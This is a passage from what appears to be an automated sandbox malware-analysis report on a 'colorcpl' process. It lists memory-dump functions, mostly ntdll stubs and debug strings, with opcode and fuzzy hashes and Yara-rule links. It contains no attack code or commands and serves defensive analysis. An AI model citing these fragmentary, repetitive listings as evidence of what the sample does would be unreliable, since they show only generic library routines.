                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: c0719a6545358dc19fcfb88aef3bf364856a00b7f52d9bc0a3c0efa40b79e43e
                          • Instruction ID: aa4d9e013b21e2aac356a1c5c5c87c3aaea79c38020e22c2cdb972856753c4e9
                          • Opcode Fuzzy Hash: c0719a6545358dc19fcfb88aef3bf364856a00b7f52d9bc0a3c0efa40b79e43e
                          • Instruction Fuzzy Hash: B390022921380042F2807158540870A00158BD1206F95D415B00167ACCC915D9696321
                          Function 04CF2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 149 4cf2d30-4cf2d3c LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 4a1446032342bb00c97817a099bdd7755e1f43cd02a356d8051543260bc938a3
                          • Instruction ID: c6ce6e4486c401761b4b5f8c10bae7867d8f9177b2c4cc4ba6e9c7ea54838c07
                          • Opcode Fuzzy Hash: 4a1446032342bb00c97817a099bdd7755e1f43cd02a356d8051543260bc938a3
                          • Instruction Fuzzy Hash: A290022130180043F240715854187064015DBE1305F55D011F04157A8CD915D9566222
                          Function 04CF2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: c87491db24ca0f4a740ec6f8742a370b4dab00d0eb1b7fa30e010554142da6f5
                          • Instruction ID: 5c3d4e0ccf294cc9490b61dfd6f13f896d5e62716fc44225c1f715c6825bf971
                          • Opcode Fuzzy Hash: c87491db24ca0f4a740ec6f8742a370b4dab00d0eb1b7fa30e010554142da6f5
                          • Instruction Fuzzy Hash: E9900261201C0443F2407558480470700158BD0306F55C011B20657A9E8A29DD517135
                          Function 04CF2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 6ad413ca845a1b8a70c6ed94e9adcc33d1ba0008c12589cd62eb5c82469f2663
                          • Instruction ID: 315cdb0d0ca6f367bb8106732028ba21d9ccdc8f5056a83dd5a34eb3025b2ded
                          • Opcode Fuzzy Hash: 6ad413ca845a1b8a70c6ed94e9adcc33d1ba0008c12589cd62eb5c82469f2663
                          • Instruction Fuzzy Hash: F290022160180542F20171584404716001A8BD0245F95C022B10257A9ECA25DA92B131
                          Function 04CF2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 4994d3940b1c89adfe7947a7e39f37d46ec311c579123323b5c534d4d11b4536
                          • Instruction ID: 0489fdaf3834d3d6380885c73666489789ead80b4d2cff6e2031831b90e471a3
                          • Opcode Fuzzy Hash: 4994d3940b1c89adfe7947a7e39f37d46ec311c579123323b5c534d4d11b4536
                          • Instruction Fuzzy Hash: 7E900221211C0082F30075684C14B0700158BD0307F55C115B01557A8CC915D9616521
                          Function 04CF2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 0d46ac85e1f784bab94f1137f16a400f2bf06d219a7d8671ba3f4286c9ed48ef
                          • Instruction ID: 0b97e0a338d4e66dbad67650c50f08dfa75fa31044074960047ad28e98ebcfa8
                          • Opcode Fuzzy Hash: 0d46ac85e1f784bab94f1137f16a400f2bf06d219a7d8671ba3f4286c9ed48ef
                          • Instruction Fuzzy Hash: 9090022160180082624071688844A064015AFE1215755C121B09997A4D8559D9656665
                          Function 04CF2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 923cf47ff4789abf966886f86de803ab5ff9519bac52b83d55b35aee2ee153ce
                          • Instruction ID: 002f93877fc08266e5d1cafaf259c32467cd442714c0aede44df1596273bfe90
                          • Opcode Fuzzy Hash: 923cf47ff4789abf966886f86de803ab5ff9519bac52b83d55b35aee2ee153ce
                          • Instruction Fuzzy Hash: 5D90026134180482F20071584414B060015CBE1305F55C015F10657A8D8619DD527126
                          Function 04CF2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 139 4cf2ad0-4cf2adc LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 6e0369f26a8f4cb7509d64353a6391326be871613e29a6e294d257e07b8c5b6f
                          • Instruction ID: e254a2984fba97ad2d011269b6a2056c159bfd3f9848230ac2ce54f3164e9de8
                          • Opcode Fuzzy Hash: 6e0369f26a8f4cb7509d64353a6391326be871613e29a6e294d257e07b8c5b6f
                          • Instruction Fuzzy Hash: BD900225211800432205B558070460700568BD5355355C021F10167A4CD621D9616121
                          Function 04CF2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 140 4cf2af0-4cf2afc LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 4e85d11dd58f81929950f0872694a16e620e37b2bf9d6ec120b0a89d0117b082
                          • Instruction ID: bca50973cebef71e61a5c6ab705b2ec30c33e6de13b5fe50fd98fad66becb679
                          • Opcode Fuzzy Hash: 4e85d11dd58f81929950f0872694a16e620e37b2bf9d6ec120b0a89d0117b082
                          • Instruction Fuzzy Hash: 65900225221800422245B558060460B04559BD6355395C015F14177E4CC621D9656321
                          Function 04CF2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 143 4cf2be0-4cf2bec LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 0ab1139cabdff37981711a05e8616be824202f646e931e6019ad1b76079a5d0c
                          • Instruction ID: 6936d486bfdd80e03389b55fecbb4a0561fe55d729cb10915e20db36f7eab3f1
                          • Opcode Fuzzy Hash: 0ab1139cabdff37981711a05e8616be824202f646e931e6019ad1b76079a5d0c
                          • Instruction Fuzzy Hash: 5190023120584882F24071584404B4600258BD0309F55C011B00657E8D9625DE55B661
                          Function 04CF2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 144 4cf2bf0-4cf2bfc LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: d68aee0bee843c213ed35da9c55dd7d0f2a79f008ece3e089ba4fa1055ea34f1
                          • Instruction ID: 446626967acd2366cbe4b91106bf472cd0f02318aa6c1d160230f0ba403d300a
                          • Opcode Fuzzy Hash: d68aee0bee843c213ed35da9c55dd7d0f2a79f008ece3e089ba4fa1055ea34f1
                          • Instruction Fuzzy Hash: 2A90023120180842F2807158440474A00158BD1305F95C015B00267A8DCA15DB5977A1
                          Function 04CF2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 142 4cf2ba0-4cf2bac LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 62f4aac81fe84b22df204edad4f76160fede61bd5a54f376bbc745f1aaaff1d9
                          • Instruction ID: c4af4e3eab5509e7db7eff887b82e686e4351f32ecaf01b87eab24c9721f87b6
                          • Opcode Fuzzy Hash: 62f4aac81fe84b22df204edad4f76160fede61bd5a54f376bbc745f1aaaff1d9
                          • Instruction Fuzzy Hash: A690023160580842F2507158441474600158BD0305F55C011B00257A8D8755DB5576A1
                          Function 04CF2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 141 4cf2b60-4cf2b6c LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 3ebddd25f4c38799794823ddad13f516e24a388608bd2e6b4f5cd306d63f36df
                          • Instruction ID: b89428d2f7d15ebd010d5bdc964d29aa6319f37c8801b7cbe64400244b938b4b
                          • Opcode Fuzzy Hash: 3ebddd25f4c38799794823ddad13f516e24a388608bd2e6b4f5cd306d63f36df
                          • Instruction Fuzzy Hash: 5F90026120280043620571584414716401A8BE0205B55C021F10157E4DC525D9917125
                          Function 04CF35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 72a2945cedcfb5bae48ea0b3c27de3efff9c865076907e6a31d2cf3ff6acd66f
                          • Instruction ID: cdd719653258214fca245bb8f5857bd6844fba96ba10640bb0e7ed19eeb91dee
                          • Opcode Fuzzy Hash: 72a2945cedcfb5bae48ea0b3c27de3efff9c865076907e6a31d2cf3ff6acd66f
                          • Instruction Fuzzy Hash: 6D90023160590442F2007158451470610158BD0205F65C411B04257BCD8795DA5175A2
                          Function 04CF39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: b7f94d9440f6803c1f7379601bbc8760e1ba211d052ba5e828c7778c3347ccd5
                          • Instruction ID: c8f9b7f22896a6bbe125ccae33fc8c509ca1182964f6fb151801c60f01b0c0b5
                          • Opcode Fuzzy Hash: b7f94d9440f6803c1f7379601bbc8760e1ba211d052ba5e828c7778c3347ccd5
                          • Instruction Fuzzy Hash: E890022124585142F250715C44047164015ABE0205F55C021B08157E8D8555D9557221
                          Function 04CF2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 135 4cf2c0a-4cf2c0f 136 4cf2c1f-4cf2c26 LdrInitializeThunk 135->136 137 4cf2c11-4cf2c18 135->137
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: c0a3823ade9e2523651450298e355a1b779921e72c4977446f1e9dfbc823fa27
                          • Instruction ID: 746429c492c33ab83f9abea5874e1eb6aafd94d7997851d8b48786f7e9df376c
                          • Opcode Fuzzy Hash: c0a3823ade9e2523651450298e355a1b779921e72c4977446f1e9dfbc823fa27
                          • Instruction Fuzzy Hash: 8CB09B719019C5C5FB51F7604A087177911ABD0705F16C061E3030795E473DD1D1F175
                          Function 02A9E532 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.2284585665.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2a80000_colorcpl.jbxd
                          Similarity
                          • API ID:
                          • String ID: _)k!
                          • API String ID: 0-1339432885
                          • Opcode ID: dd760dce9d007f9f1a5d1396a0f3e76f7f4f4630b9de9a3796cf4d858af93321
                          • Instruction ID: c90617ccac3a0bcff9a09a3fc534e4a2260e3709b272b4d17ed4a1ed21c4fac6
                          • Opcode Fuzzy Hash: dd760dce9d007f9f1a5d1396a0f3e76f7f4f4630b9de9a3796cf4d858af93321
                          • Instruction Fuzzy Hash: 221197350189829BEF009F22DEC53C6BBF2FA9AA1571842DAD6504F127DB129107C7C0
                          Function 02A95C55 Relevance: .0, Instructions: 8COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.2284585665.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2a80000_colorcpl.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 66dd7e20e25fdefa2ac2d5bcea97c3490eb6228dc5c6a11464d2a2872ee4c50f
                          • Instruction ID: 5fe173b7c29245a30552480beddd33e8cfb594091bc16ee560a6b33c07b7f2f1
                          • Opcode Fuzzy Hash: 66dd7e20e25fdefa2ac2d5bcea97c3490eb6228dc5c6a11464d2a2872ee4c50f
                          • Instruction Fuzzy Hash: 62A024C50C04FD03000313305D5454707474DC10573113C4044003330047347707005D

                          Non-executed Functions

                          Function 04B404E0 Relevance: .1, Instructions: 149COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288786271.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4b40000_colorcpl.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7322755d39c82d0f9b079a38622af6349fcad5e475632202875febf31e825287
                          • Instruction ID: 80694586416a00b7fb7574e414b1ad85ca89dd24b0ec44d5c373605b6ff5a60d
                          • Opcode Fuzzy Hash: 7322755d39c82d0f9b079a38622af6349fcad5e475632202875febf31e825287
                          • Instruction Fuzzy Hash: 3441F571A18B0D4FD768BF689081376B3E2FBD6314F50056DC98AC3252EA74F8468785
                          Function 04CF2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                          • API String ID: 48624451-2108815105
                          • Opcode ID: b7f0382918bdbae068f7aff175de01963f899d42ffafcc9a81e5a594352018fa
                          • Instruction ID: 32626f1a50f58025f35c7e402ac6e114134599fbb3944caa301aee1315caf1b7
                          • Opcode Fuzzy Hash: b7f0382918bdbae068f7aff175de01963f899d42ffafcc9a81e5a594352018fa
                          • Instruction Fuzzy Hash: C151E5B2B00156BFDB50DF989D9097FF7B9FB082047548169E5A5D7641E239FF008BA0
                          Function 04D62410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                          • API String ID: 48624451-2108815105
                          • Opcode ID: d61f77356ec81dc121738cee6f87a90509c5e1fc1e5ab803b4cb84eb8a472a04
                          • Instruction ID: b16d061662f3d28b8f52c579ec19e0c01e3fb4ebf0698d0960bf247ac2b59d40
                          • Opcode Fuzzy Hash: d61f77356ec81dc121738cee6f87a90509c5e1fc1e5ab803b4cb84eb8a472a04
                          • Instruction Fuzzy Hash: C051C775B00645AFDB30EE5CC89497FBBF9EB44304B4484AAE8D7D7681E674FA408760
                          Function 04CE7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                          Download Yara Rule
                          Strings
                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 04D24787
                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04D24655
                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04D24742
                          • ExecuteOptions, xrefs: 04D246A0
                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04D24725
                          • Execute=1, xrefs: 04D24713
                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04D246FC
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID:
                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                          • API String ID: 0-484625025
                          • Opcode ID: 594f8ae684fc250a0839353abb63639677041300252e701b79d995b4680015b6
                          • Instruction ID: c02b1f2cf1ef2539058ac6149e5dd098533d0355221c0d9fad65e9d2f2207a3b
                          • Opcode Fuzzy Hash: 594f8ae684fc250a0839353abb63639677041300252e701b79d995b4680015b6
                          • Instruction Fuzzy Hash: 05510B31A01219BBEF11EFA5DC59FBA77AEEF14708F0400A9D505AB190EB71BE458F50
                          Function 04D86940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                          • Instruction ID: 84dc7b9fe718e0dc20a3cd3147b4ea0987f89c5aeb38e83ba88ce7d05cfd4935
                          • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
